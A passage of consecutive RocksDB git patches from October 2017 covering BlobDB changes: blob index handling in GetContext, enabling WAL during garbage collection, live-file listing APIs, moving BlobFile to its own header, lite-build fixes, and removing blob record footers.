(is_blob_index_ != nullptr) { + *is_blob_index_ = (type == kTypeBlobIndex); + } return false; case kTypeDeletion: diff --git a/table/get_context.h b/table/get_context.h index ac50680b645..a708f6be745 100644 --- a/table/get_context.h +++ b/table/get_context.h @@ -22,7 +22,8 @@ class GetContext { kFound, kDeleted, kCorrupt, - kMerge // saver contains the current merge result (the operands) + kMerge, // saver contains the current merge result (the operands) + kBlobIndex, }; GetContext(const Comparator* ucmp, const MergeOperator* merge_operator, @@ -30,7 +31,8 @@ class GetContext { const Slice& user_key, PinnableSlice* value, bool* value_found, MergeContext* merge_context, RangeDelAggregator* range_del_agg, Env* env, SequenceNumber* seq = nullptr, - PinnedIteratorsManager* _pinned_iters_mgr = nullptr); + PinnedIteratorsManager* _pinned_iters_mgr = nullptr, + bool* is_blob_index = nullptr); void MarkKeyMayExist(); @@ -83,6 +85,7 @@ class GetContext { // Used to temporarily pin blocks when state_ == GetContext::kMerge PinnedIteratorsManager* pinned_iters_mgr_; bool sample_; + bool* is_blob_index_; }; void replayGetContextLog(const Slice& replay_log, const Slice& user_key, diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 6e8c9af4bb0..3918941cfc0 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -806,7 +806,7 @@ TEST_F(BlobDBTest, ReadWhileGC) { TEST_F(BlobDBTest, ColumnFamilyNotSupported) { Options options; options.env = mock_env_.get(); - mock_env_->set_now_micros(0); + mock_env_->set_current_time(0); Open(BlobDBOptions(), options); ColumnFamilyHandle *default_handle = blob_db_->DefaultColumnFamily(); ColumnFamilyHandle *handle = nullptr; From 8cff6e9456f53d9a07bdb2704643a03672195e39 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Fri, 6 Oct 2017 10:53:46 -0700 Subject: [PATCH 171/205] Enable WAL for blob index Summary: Enabled WAL, during GC, for blob index which is stored on regular RocksDB. Closes https://github.com/facebook/rocksdb/pull/2975 Differential Revision: D5997384 Pulled By: sagar0 fbshipit-source-id: b76c1487d8b5be0e36c55e8d77ffe3d37d63d85b --- utilities/blob_db/blob_db_impl.cc | 10 ---------- 1 file changed, 10 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 777018aef15..60c91e8ac5a 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -1738,16 +1738,6 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, static const WriteOptions kGarbageCollectionWriteOptions = []() { WriteOptions write_options; - // TODO(yiwu): Disable WAL for garbage colection to make it compatible with - // use cases that don't use WAL. However without WAL there are at least - // two issues with crash: - // 1. If a key is dropped from blob file (e.g. due to TTL), right before a - // crash, the key may still presents in LSM after restart. - // 2. If a key is relocated to another blob file, right before a crash, - // after restart the new offset may be lost with the old offset pointing - // to the removed blob file. - // We need to have better recovery mechanism to address these issues. - write_options.disableWAL = true; // It is ok to ignore column families that were dropped. write_options.ignore_missing_column_families = true; return write_options; From 3747361235127f2f0a1fc8a3ee7d64e67c1bee1b Mon Sep 17 00:00:00 2001 From: Zhongyi Xie Date: Mon, 9 Oct 2017 19:44:39 -0700 Subject: [PATCH 172/205] add GetLiveFiles and GetLiveFilesMetaData for BlobDB Summary: Closes https://github.com/facebook/rocksdb/pull/2976 Differential Revision: D5994759 Pulled By: miasantreble fbshipit-source-id: 985c31dccb957cb970c302f813cd07a1e8cb6438 --- utilities/blob_db/blob_db_impl.cc | 33 +++++++++++++++++++++++++++++++ utilities/blob_db/blob_db_impl.h | 6 ++++++ utilities/blob_db/blob_db_test.cc | 24 ++++++++++++++++++++++ 3 files changed, 63 insertions(+) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 60c91e8ac5a..ea3e38985fe 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -948,6 +948,39 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { return Status::OK(); } +Status BlobDBImpl::GetLiveFiles(std::vector& ret, + uint64_t* manifest_file_size, + bool flush_memtable) { + // Hold a lock in the beginning to avoid updates to base DB during the call + ReadLock rl(&mutex_); + Status s = db_->GetLiveFiles(ret, manifest_file_size, flush_memtable); + if (!s.ok()) { + return s; + } + ret.reserve(ret.size() + blob_files_.size()); + for (auto bfile_pair : blob_files_) { + auto blob_file = bfile_pair.second; + ret.emplace_back(blob_file->PathName()); + } + return Status::OK(); +} + +void BlobDBImpl::GetLiveFilesMetaData(std::vector* metadata) { + // Hold a lock in the beginning to avoid updates to base DB during the call + ReadLock rl(&mutex_); + db_->GetLiveFilesMetaData(metadata); + for (auto bfile_pair : blob_files_) { + auto blob_file = bfile_pair.second; + LiveFileMetaData filemetadata; + filemetadata.size = blob_file->GetFileSize(); + filemetadata.name = blob_file->PathName(); + auto cfh = + reinterpret_cast(DefaultColumnFamily()); + filemetadata.column_family_name = cfh->GetName(); + metadata->emplace_back(filemetadata); + } +} + Status BlobDBImpl::PutWithTTL(const WriteOptions& options, const Slice& key, const Slice& value, uint64_t ttl) { diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index d8dec6d4c27..a9e0c3846bc 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -227,6 +227,12 @@ class BlobDBImpl : public BlobDB { virtual Status Write(const WriteOptions& opts, WriteBatch* updates) override; + virtual Status GetLiveFiles(std::vector&, + uint64_t* manifest_file_size, + bool flush_memtable = true) override; + virtual void GetLiveFilesMetaData( + std::vector* ) override; + using BlobDB::PutWithTTL; Status PutWithTTL(const WriteOptions& options, const Slice& key, const Slice& value, uint64_t ttl) override; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 3918941cfc0..9d0214effb7 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -836,6 +836,30 @@ TEST_F(BlobDBTest, ColumnFamilyNotSupported) { delete handle; } +TEST_F(BlobDBTest, GetLiveFilesMetaData) { + Random rnd(301); + BlobDBOptions bdb_options; + bdb_options.disable_background_tasks = true; + Open(bdb_options); + std::map data; + for (size_t i = 0; i < 100; i++) { + PutRandom("key" + ToString(i), &rnd, &data); + } + auto *bdb_impl = static_cast(blob_db_); + std::vector metadata; + bdb_impl->GetLiveFilesMetaData(&metadata); + ASSERT_EQ(1U, metadata.size()); + std::string filename = dbname_ + "/blob_dir/000001.blob"; + ASSERT_EQ(filename, metadata[0].name); + ASSERT_EQ("default", metadata[0].column_family_name); + std::vector livefile; + uint64_t mfs; + bdb_impl->GetLiveFiles(livefile, &mfs, false); + ASSERT_EQ(4U, livefile.size()); + ASSERT_EQ(filename, livefile[3]); + VerifyDB(data); +} + } // namespace blob_db } // namespace rocksdb From dded348dda7580288e039cccd3a8b2f39b39c0f5 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 13 Oct 2017 14:36:36 -0700 Subject: [PATCH 173/205] Blob DB: Move BlobFile definition to a separate file Summary: simply move BlobFile definition from blob_db_impl.h to blob_file.h. Closes https://github.com/facebook/rocksdb/pull/3002 Differential Revision: D6050143 Pulled By: yiwu-arbug fbshipit-source-id: a8fb6e094fe39bdeace6279569834bc65aa64a34 --- utilities/blob_db/blob_db_impl.h | 168 +-------------------------- utilities/blob_db/blob_file.cc | 10 +- utilities/blob_db/blob_file.h | 187 +++++++++++++++++++++++++++++++ 3 files changed, 194 insertions(+), 171 deletions(-) create mode 100644 utilities/blob_db/blob_file.h diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index a9e0c3846bc..6cb0d30a220 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -9,7 +9,6 @@ #include #include -#include #include #include #include @@ -24,11 +23,11 @@ #include "rocksdb/listener.h" #include "rocksdb/options.h" #include "rocksdb/wal_filter.h" -#include "util/file_reader_writer.h" #include "util/mpsc.h" #include "util/mutexlock.h" #include "util/timer_queue.h" #include "utilities/blob_db/blob_db.h" +#include "utilities/blob_db/blob_file.h" #include "utilities/blob_db/blob_log_format.h" #include "utilities/blob_db/blob_log_reader.h" #include "utilities/blob_db/blob_log_writer.h" @@ -533,171 +532,6 @@ class BlobDBImpl : public BlobDB { uint32_t debug_level_; }; -class BlobFile { - friend class BlobDBImpl; - friend struct blobf_compare_ttl; - - private: - // access to parent - const BlobDBImpl* parent_; - - // path to blob directory - std::string path_to_dir_; - - // the id of the file. - // the above 2 are created during file creation and never changed - // after that - uint64_t file_number_; - - // number of blobs in the file - std::atomic blob_count_; - - // the file will be selected for GC in this future epoch - std::atomic gc_epoch_; - - // size of the file - std::atomic file_size_; - - // number of blobs in this particular file which have been evicted - uint64_t deleted_count_; - - // size of deleted blobs (used by heuristic to select file for GC) - uint64_t deleted_size_; - - BlobLogHeader header_; - - // closed_ = true implies the file is no more mutable - // no more blobs will be appended and the footer has been written out - std::atomic closed_; - - // has a pass of garbage collection successfully finished on this file - // can_be_deleted_ still needs to do iterator/snapshot checks - std::atomic can_be_deleted_; - - // should this file been gc'd once to reconcile lost deletes/compactions - std::atomic gc_once_after_open_; - - // et - lt of the blobs - ttlrange_t ttl_range_; - - // et - lt of the timestamp of the KV pairs. - tsrange_t time_range_; - - // ESN - LSN of the blobs - snrange_t sn_range_; - - // Sequential/Append writer for blobs - std::shared_ptr log_writer_; - - // random access file reader for GET calls - std::shared_ptr ra_file_reader_; - - // This Read-Write mutex is per file specific and protects - // all the datastructures - mutable port::RWMutex mutex_; - - // time when the random access reader was last created. - std::atomic last_access_; - - // last time file was fsync'd/fdatasyncd - std::atomic last_fsync_; - - bool header_valid_; - - public: - BlobFile(); - - BlobFile(const BlobDBImpl* parent, const std::string& bdir, uint64_t fnum); - - ~BlobFile(); - - ColumnFamilyHandle* GetColumnFamily(DB* db); - - // Returns log file's pathname relative to the main db dir - // Eg. For a live-log-file = blob_dir/000003.blob - std::string PathName() const; - - // Primary identifier for blob file. - // once the file is created, this never changes - uint64_t BlobFileNumber() const { return file_number_; } - - // the following functions are atomic, and don't need - // read lock - uint64_t BlobCount() const { - return blob_count_.load(std::memory_order_acquire); - } - - std::string DumpState() const; - - // if the file has gone through GC and blobs have been relocated - bool Obsolete() const { return can_be_deleted_.load(); } - - // if the file is not taking any more appends. - bool Immutable() const { return closed_.load(); } - - // we will assume this is atomic - bool NeedsFsync(bool hard, uint64_t bytes_per_sync) const; - - uint64_t GetFileSize() const { - return file_size_.load(std::memory_order_acquire); - } - - // All Get functions which are not atomic, will need ReadLock on the mutex - tsrange_t GetTimeRange() const { - assert(HasTimestamp()); - return time_range_; - } - - ttlrange_t GetTTLRange() const { return ttl_range_; } - - snrange_t GetSNRange() const { return sn_range_; } - - bool HasTTL() const { - assert(header_valid_); - return header_.HasTTL(); - } - - bool HasTimestamp() const { - assert(header_valid_); - return header_.HasTimestamp(); - } - - std::shared_ptr GetWriter() const { return log_writer_; } - - void Fsync(); - - private: - std::shared_ptr OpenSequentialReader( - Env* env, const DBOptions& db_options, - const EnvOptions& env_options) const; - - Status ReadFooter(BlobLogFooter* footer); - - Status WriteFooterAndCloseLocked(); - - std::shared_ptr GetOrOpenRandomAccessReader( - Env* env, const EnvOptions& env_options, bool* fresh_open); - - void CloseRandomAccessLocked(); - - // this is used, when you are reading only the footer of a - // previously closed file - Status SetFromFooterLocked(const BlobLogFooter& footer); - - void set_time_range(const tsrange_t& tr) { time_range_ = tr; } - - void set_ttl_range(const ttlrange_t& ttl) { ttl_range_ = ttl; } - - void SetSNRange(const snrange_t& snr) { sn_range_ = snr; } - - // The following functions are atomic, and don't need locks - void SetFileSize(uint64_t fs) { file_size_ = fs; } - - void SetBlobCount(uint64_t bc) { blob_count_ = bc; } - - void SetCanBeDeleted() { can_be_deleted_ = true; } -}; - class BlobDBIterator : public Iterator { public: explicit BlobDBIterator(Iterator* iter, BlobDBImpl* impl, bool own_snapshot, diff --git a/utilities/blob_db/blob_file.cc b/utilities/blob_db/blob_file.cc index 8ba005dd6e1..dd98ed9d120 100644 --- a/utilities/blob_db/blob_file.cc +++ b/utilities/blob_db/blob_file.cc @@ -3,15 +3,15 @@ // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE +#include "utilities/blob_db/blob_file.h" #include -#include #include #include -#include "utilities/blob_db/blob_db_impl.h" #include "util/filename.h" #include "util/logging.h" +#include "utilities/blob_db/blob_db_impl.h" namespace rocksdb { @@ -193,8 +193,10 @@ void BlobFile::CloseRandomAccessLocked() { std::shared_ptr BlobFile::GetOrOpenRandomAccessReader( Env* env, const EnvOptions& env_options, bool* fresh_open) { *fresh_open = false; - last_access_ = - std::chrono::system_clock::to_time_t(std::chrono::system_clock::now()); + int64_t current_time = 0; + env->GetCurrentTime(¤t_time); + last_access_.store(current_time); + { ReadLock lockbfile_r(&mutex_); if (ra_file_reader_) return ra_file_reader_; diff --git a/utilities/blob_db/blob_file.h b/utilities/blob_db/blob_file.h new file mode 100644 index 00000000000..d648ddee412 --- /dev/null +++ b/utilities/blob_db/blob_file.h @@ -0,0 +1,187 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). +#pragma once +#ifndef ROCKSDB_LITE + +#include +#include + +#include "port/port.h" +#include "rocksdb/env.h" +#include "rocksdb/options.h" +#include "util/file_reader_writer.h" +#include "utilities/blob_db/blob_log_format.h" +#include "utilities/blob_db/blob_log_writer.h" + +namespace rocksdb { +namespace blob_db { + +class BlobFile { + friend class BlobDBImpl; + friend struct blobf_compare_ttl; + + private: + // access to parent + const BlobDBImpl* parent_; + + // path to blob directory + std::string path_to_dir_; + + // the id of the file. + // the above 2 are created during file creation and never changed + // after that + uint64_t file_number_; + + // number of blobs in the file + std::atomic blob_count_; + + // the file will be selected for GC in this future epoch + std::atomic gc_epoch_; + + // size of the file + std::atomic file_size_; + + // number of blobs in this particular file which have been evicted + uint64_t deleted_count_; + + // size of deleted blobs (used by heuristic to select file for GC) + uint64_t deleted_size_; + + BlobLogHeader header_; + + // closed_ = true implies the file is no more mutable + // no more blobs will be appended and the footer has been written out + std::atomic closed_; + + // has a pass of garbage collection successfully finished on this file + // can_be_deleted_ still needs to do iterator/snapshot checks + std::atomic can_be_deleted_; + + // should this file been gc'd once to reconcile lost deletes/compactions + std::atomic gc_once_after_open_; + + // et - lt of the blobs + ttlrange_t ttl_range_; + + // et - lt of the timestamp of the KV pairs. + tsrange_t time_range_; + + // ESN - LSN of the blobs + snrange_t sn_range_; + + // Sequential/Append writer for blobs + std::shared_ptr log_writer_; + + // random access file reader for GET calls + std::shared_ptr ra_file_reader_; + + // This Read-Write mutex is per file specific and protects + // all the datastructures + mutable port::RWMutex mutex_; + + // time when the random access reader was last created. + std::atomic last_access_; + + // last time file was fsync'd/fdatasyncd + std::atomic last_fsync_; + + bool header_valid_; + + public: + BlobFile(); + + BlobFile(const BlobDBImpl* parent, const std::string& bdir, uint64_t fnum); + + ~BlobFile(); + + ColumnFamilyHandle* GetColumnFamily(DB* db); + + // Returns log file's pathname relative to the main db dir + // Eg. For a live-log-file = blob_dir/000003.blob + std::string PathName() const; + + // Primary identifier for blob file. + // once the file is created, this never changes + uint64_t BlobFileNumber() const { return file_number_; } + + // the following functions are atomic, and don't need + // read lock + uint64_t BlobCount() const { + return blob_count_.load(std::memory_order_acquire); + } + + std::string DumpState() const; + + // if the file has gone through GC and blobs have been relocated + bool Obsolete() const { return can_be_deleted_.load(); } + + // if the file is not taking any more appends. + bool Immutable() const { return closed_.load(); } + + // we will assume this is atomic + bool NeedsFsync(bool hard, uint64_t bytes_per_sync) const; + + uint64_t GetFileSize() const { + return file_size_.load(std::memory_order_acquire); + } + + // All Get functions which are not atomic, will need ReadLock on the mutex + tsrange_t GetTimeRange() const { + assert(HasTimestamp()); + return time_range_; + } + + ttlrange_t GetTTLRange() const { return ttl_range_; } + + snrange_t GetSNRange() const { return sn_range_; } + + bool HasTTL() const { + assert(header_valid_); + return header_.HasTTL(); + } + + bool HasTimestamp() const { + assert(header_valid_); + return header_.HasTimestamp(); + } + + std::shared_ptr GetWriter() const { return log_writer_; } + + void Fsync(); + + private: + std::shared_ptr OpenSequentialReader( + Env* env, const DBOptions& db_options, + const EnvOptions& env_options) const; + + Status ReadFooter(BlobLogFooter* footer); + + Status WriteFooterAndCloseLocked(); + + std::shared_ptr GetOrOpenRandomAccessReader( + Env* env, const EnvOptions& env_options, bool* fresh_open); + + void CloseRandomAccessLocked(); + + // this is used, when you are reading only the footer of a + // previously closed file + Status SetFromFooterLocked(const BlobLogFooter& footer); + + void set_time_range(const tsrange_t& tr) { time_range_ = tr; } + + void set_ttl_range(const ttlrange_t& ttl) { ttl_range_ = ttl; } + + void SetSNRange(const snrange_t& snr) { sn_range_ = snr; } + + // The following functions are atomic, and don't need locks + void SetFileSize(uint64_t fs) { file_size_ = fs; } + + void SetBlobCount(uint64_t bc) { blob_count_ = bc; } + + void SetCanBeDeleted() { can_be_deleted_ = true; } +}; +} // namespace blob_db +} // namespace rocksdb +#endif // ROCKSDB_LITE From 8afb0036cacead7fdb7dd3413b49d670b39a81b0 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 17 Oct 2017 08:49:11 -0700 Subject: [PATCH 174/205] fix lite build Summary: * make `checksum_type_string_map` available for lite * comment out `FilesPerLevel` in lite mode. * travis and legocastle lite build also build `all` target and run tests Closes https://github.com/facebook/rocksdb/pull/3015 Differential Revision: D6069822 Pulled By: yiwu-arbug fbshipit-source-id: 9fe92ac220e711e9e6ed4e921bd25ef4314796a0 --- .travis.yml | 2 +- build_tools/rocksdb-lego-determinator | 25 +------------------------ db/db_blob_index_test.cc | 2 ++ db/db_test2.cc | 6 ++++++ options/options_helper.h | 6 +++--- 5 files changed, 13 insertions(+), 28 deletions(-) diff --git a/.travis.yml b/.travis.yml index 78e51915943..b76973d4e8e 100644 --- a/.travis.yml +++ b/.travis.yml @@ -61,7 +61,7 @@ script: - if [ "${TEST_GROUP}" == '1' ]; then OPT=-DTRAVIS V=1 ROCKSDBTESTS_START=db_block_cache_test ROCKSDBTESTS_END=comparator_db_test make -j4 check_some; fi - if [ "${TEST_GROUP}" == '2' ]; then OPT=-DTRAVIS V=1 ROCKSDBTESTS_START=comparator_db_test make -j4 check_some; fi - if [ "${JOB_NAME}" == 'java_test' ]; then OPT=-DTRAVIS V=1 make clean jclean && make rocksdbjava jtest; fi - - if [ "${JOB_NAME}" == 'lite_build' ]; then OPT="-DTRAVIS -DROCKSDB_LITE" V=1 make -j4 static_lib; fi + - if [ "${JOB_NAME}" == 'lite_build' ]; then OPT="-DTRAVIS -DROCKSDB_LITE" V=1 make -j4 static_lib tools; fi - if [ "${JOB_NAME}" == 'examples' ]; then OPT=-DTRAVIS V=1 make -j4 static_lib; cd examples; make -j4; fi - if [ "${JOB_NAME}" == 'cmake' ]; then mkdir build && cd build && cmake .. && make -j4 rocksdb; fi - if [ "${JOB_NAME}" == 'cmake-mingw' ]; then mkdir build && cd build && cmake .. -DCMAKE_C_COMPILER=x86_64-w64-mingw32-gcc -DCMAKE_CXX_COMPILER=x86_64-w64-mingw32-g++ -DCMAKE_SYSTEM_NAME=Windows && make -j4 rocksdb; fi diff --git a/build_tools/rocksdb-lego-determinator b/build_tools/rocksdb-lego-determinator index a40b3064e44..6e8ae9cd733 100755 --- a/build_tools/rocksdb-lego-determinator +++ b/build_tools/rocksdb-lego-determinator @@ -343,27 +343,7 @@ LITE_BUILD_COMMANDS="[ $CLEANUP_ENV, { 'name':'Build RocksDB debug version', - 'shell':'$LITE make J=1 static_lib || $CONTRUN_NAME=lite_static_lib $TASK_CREATION_TOOL', - 'user':'root', - $PARSER - }, - ], - $REPORT - } -]" - -# -# RocksDB lite tests -# -LITE_UNIT_TEST_COMMANDS="[ - { - 'name':'Rocksdb Lite Unit Test', - 'oncall':'$ONCALL', - 'steps': [ - $CLEANUP_ENV, - { - 'name':'Build RocksDB debug version', - 'shell':'$SHM $LITE make J=1 check || $CONTRUN_NAME=lite_check $TASK_CREATION_TOOL', + 'shell':'$LITE make J=1 all check || $CONTRUN_NAME=lite $TASK_CREATION_TOOL', 'user':'root', $PARSER }, @@ -748,9 +728,6 @@ case $1 in lite) echo $LITE_BUILD_COMMANDS ;; - lite_test) - echo $LITE_UNIT_TEST_COMMANDS - ;; stress_crash) echo $STRESS_CRASH_TEST_COMMANDS ;; diff --git a/db/db_blob_index_test.cc b/db/db_blob_index_test.cc index bfc95760c02..e71b511df5b 100644 --- a/db/db_blob_index_test.cc +++ b/db/db_blob_index_test.cc @@ -122,7 +122,9 @@ class DBBlobIndexTest : public DBTestBase { ASSERT_OK(Flush()); ASSERT_OK( dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr)); +#ifndef ROCKSDB_LITE ASSERT_EQ("0,1", FilesPerLevel()); +#endif // !ROCKSDB_LITE break; } } diff --git a/db/db_test2.cc b/db/db_test2.cc index 8f00d20e7a8..30afd5a690c 100644 --- a/db/db_test2.cc +++ b/db/db_test2.cc @@ -2315,15 +2315,21 @@ TEST_F(DBTest2, ReduceLevel) { Put("foo", "bar"); Flush(); MoveFilesToLevel(6); +#ifndef ROCKSDB_LITE ASSERT_EQ("0,0,0,0,0,0,1", FilesPerLevel()); +#endif // !ROCKSDB_LITE CompactRangeOptions compact_options; compact_options.change_level = true; compact_options.target_level = 1; dbfull()->CompactRange(compact_options, nullptr, nullptr); +#ifndef ROCKSDB_LITE ASSERT_EQ("0,1", FilesPerLevel()); +#endif // !ROCKSDB_LITE options.num_levels = 3; Reopen(options); +#ifndef ROCKSDB_LITE ASSERT_EQ("0,1", FilesPerLevel()); +#endif // !ROCKSDB_LITE } } // namespace rocksdb diff --git a/options/options_helper.h b/options/options_helper.h index 95861203917..67b04271ff3 100644 --- a/options/options_helper.h +++ b/options/options_helper.h @@ -42,6 +42,9 @@ static std::map {kCompactionStopStyleSimilarSize, "kCompactionStopStyleSimilarSize"}, {kCompactionStopStyleTotalSize, "kCompactionStopStyleTotalSize"}}; +static std::unordered_map checksum_type_string_map = + {{"kNoChecksum", kNoChecksum}, {"kCRC32c", kCRC32c}, {"kxxHash", kxxHash}}; + #ifndef ROCKSDB_LITE Status GetMutableOptionsFromStrings( @@ -600,9 +603,6 @@ static std::unordered_map static std::unordered_map encoding_type_string_map = {{"kPlain", kPlain}, {"kPrefix", kPrefix}}; -static std::unordered_map checksum_type_string_map = - {{"kNoChecksum", kNoChecksum}, {"kCRC32c", kCRC32c}, {"kxxHash", kxxHash}}; - static std::unordered_map compaction_style_string_map = { {"kCompactionStyleLevel", kCompactionStyleLevel}, From 419b93c56f66635ef1e14414af8b106475b9d9ea Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 17 Oct 2017 12:11:52 -0700 Subject: [PATCH 175/205] Blob DB: not writing sequence number as blob record footer Summary: Previously each time we write a blob we write blog_record_header + key + value + blob_record_footer to blob log. The footer only contains a sequence and a crc for the sequence number. The sequence number was used in garbage collection to verify the value is recent. After #2703 we moved to use optimistic transaction and no longer use sequence number from the footer. Remove the footer altogether. There's another usage of sequence number and we are keeping it: Each blob log file keep track of sequence number range of keys in it, and use it to check if it is reference by a snapshot, before being deleted. Closes https://github.com/facebook/rocksdb/pull/3005 Differential Revision: D6057585 Pulled By: yiwu-arbug fbshipit-source-id: d6da53c457a316e9723f359a1b47facfc3ffe090 --- utilities/blob_db/blob_db_impl.cc | 295 +++++++++------------------ utilities/blob_db/blob_db_impl.h | 7 +- utilities/blob_db/blob_db_test.cc | 37 ---- utilities/blob_db/blob_dump_tool.cc | 12 +- utilities/blob_db/blob_file.cc | 8 +- utilities/blob_db/blob_file.h | 5 + utilities/blob_db/blob_log_format.cc | 26 --- utilities/blob_db/blob_log_format.h | 10 - utilities/blob_db/blob_log_reader.cc | 42 +--- utilities/blob_db/blob_log_reader.h | 8 +- utilities/blob_db/blob_log_writer.cc | 33 +-- utilities/blob_db/blob_log_writer.h | 5 +- 12 files changed, 134 insertions(+), 354 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index ea3e38985fe..f6c6dc6e2bc 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -47,12 +47,6 @@ void extendTimestamps(rocksdb::blob_db::tsrange_t* ts_range, uint64_t ts) { ts_range->first = std::min(ts_range->first, ts); ts_range->second = std::max(ts_range->second, ts); } - -void extendSN(rocksdb::blob_db::snrange_t* sn_range, - rocksdb::SequenceNumber sn) { - sn_range->first = std::min(sn_range->first, sn); - sn_range->second = std::max(sn_range->second, sn); -} } // end namespace namespace rocksdb { @@ -438,12 +432,10 @@ Status BlobDBImpl::OpenAllFiles() { std::numeric_limits::min()); tsrange_t ts_range(std::numeric_limits::max(), std::numeric_limits::min()); - snrange_t sn_range(std::numeric_limits::max(), - std::numeric_limits::min()); uint64_t blob_count = 0; BlobLogRecord record; - Reader::ReadLevel shallow = Reader::kReadHdrKeyFooter; + Reader::ReadLevel shallow = Reader::kReadHeaderKey; uint64_t record_start = reader->GetNextByte(); // TODO(arahut) - when we detect corruption, we should truncate @@ -455,7 +447,6 @@ Status BlobDBImpl::OpenAllFiles() { if (bfptr->HasTimestamp()) { extendTimestamps(&ts_range, record.GetTimeVal()); } - extendSN(&sn_range, record.GetSN()); record_start = reader->GetNextByte(); } @@ -473,16 +464,15 @@ Status BlobDBImpl::OpenAllFiles() { } bfptr->SetBlobCount(blob_count); - bfptr->SetSNRange(sn_range); + bfptr->SetSNRange({0, 0}); if (bfptr->HasTimestamp()) bfptr->set_time_range(ts_range); ROCKS_LOG_INFO(db_options_.info_log, "Blob File: %s blob_count: %" PRIu64 - " size_bytes: %" PRIu64 - " sn_range: (%d, %d) ts: %d ttl: %d", - bfpath.c_str(), blob_count, size_bytes, sn_range.first, - sn_range.second, bfptr->HasTimestamp(), bfptr->HasTTL()); + " size_bytes: %" PRIu64 " ts: %d ttl: %d", + bfpath.c_str(), blob_count, size_bytes, + bfptr->HasTimestamp(), bfptr->HasTTL()); if (bfptr->HasTTL()) { ttl_range.second = @@ -566,11 +556,11 @@ Status BlobDBImpl::CreateWriterLocked(const std::shared_ptr& bfile) { } Writer::ElemType et = Writer::kEtNone; - if (bfile->file_size_ == BlobLogHeader::kHeaderSize) + if (bfile->file_size_ == BlobLogHeader::kHeaderSize) { et = Writer::kEtFileHdr; - else if (bfile->file_size_ > BlobLogHeader::kHeaderSize) - et = Writer::kEtFooter; - else if (bfile->file_size_) { + } else if (bfile->file_size_ > BlobLogHeader::kHeaderSize) { + et = Writer::kEtRecord; + } else if (bfile->file_size_) { ROCKS_LOG_WARN(db_options_.info_log, "Open blob file: %s with wrong size: %d", fpath.c_str(), boffset); @@ -772,14 +762,13 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { BlobDBImpl* impl_; SequenceNumber sequence_; WriteBatch updates_blob_; - Status batch_rewrite_status_; std::shared_ptr last_file_; bool has_put_; std::string new_value_; uint32_t default_cf_id_; public: - explicit BlobInserter(BlobDBImpl* impl, SequenceNumber seq) + BlobInserter(BlobDBImpl* impl, SequenceNumber seq) : impl_(impl), sequence_(seq), has_put_(false), @@ -788,9 +777,9 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { ->cfd() ->GetID()) {} - WriteBatch& updates_blob() { return updates_blob_; } + SequenceNumber sequence() { return sequence_; } - Status batch_rewrite_status() { return batch_rewrite_status_; } + WriteBatch* updates_blob() { return &updates_blob_; } std::shared_ptr& last_file() { return last_file_; } @@ -799,9 +788,8 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { virtual Status PutCF(uint32_t column_family_id, const Slice& key, const Slice& value_slice) override { if (column_family_id != default_cf_id_) { - batch_rewrite_status_ = Status::NotSupported( + return Status::NotSupported( "Blob DB doesn't support non-default column family."); - return batch_rewrite_status_; } Slice value_unc; uint64_t expiration = @@ -812,13 +800,11 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { ? impl_->SelectBlobFileTTL(expiration) : ((last_file_) ? last_file_ : impl_->SelectBlobFile()); if (last_file_ && last_file_ != bfile) { - batch_rewrite_status_ = Status::NotFound("too many blob files"); - return batch_rewrite_status_; + return Status::NotFound("too many blob files"); } if (!bfile) { - batch_rewrite_status_ = Status::NotFound("blob file not found"); - return batch_rewrite_status_; + return Status::NotFound("blob file not found"); } last_file_ = bfile; @@ -830,31 +816,26 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { std::string headerbuf; Writer::ConstructBlobHeader(&headerbuf, key, value, expiration, -1); std::string index_entry; - Status st = impl_->AppendBlob(bfile, headerbuf, key, value, &index_entry); - if (st.ok()) { - impl_->AppendSN(last_file_, sequence_); - sequence_++; + Status s = impl_->AppendBlob(bfile, headerbuf, key, value, &index_entry); + if (!s.ok()) { + return s; } + bfile->ExtendSequenceRange(sequence_); + sequence_++; if (expiration != kNoExpiration) { extendTTL(&(bfile->ttl_range_), expiration); } - if (!st.ok()) { - batch_rewrite_status_ = st; - } else { - WriteBatchInternal::Put(&updates_blob_, column_family_id, key, - index_entry); - } - return Status::OK(); + return WriteBatchInternal::Put(&updates_blob_, column_family_id, key, + index_entry); } 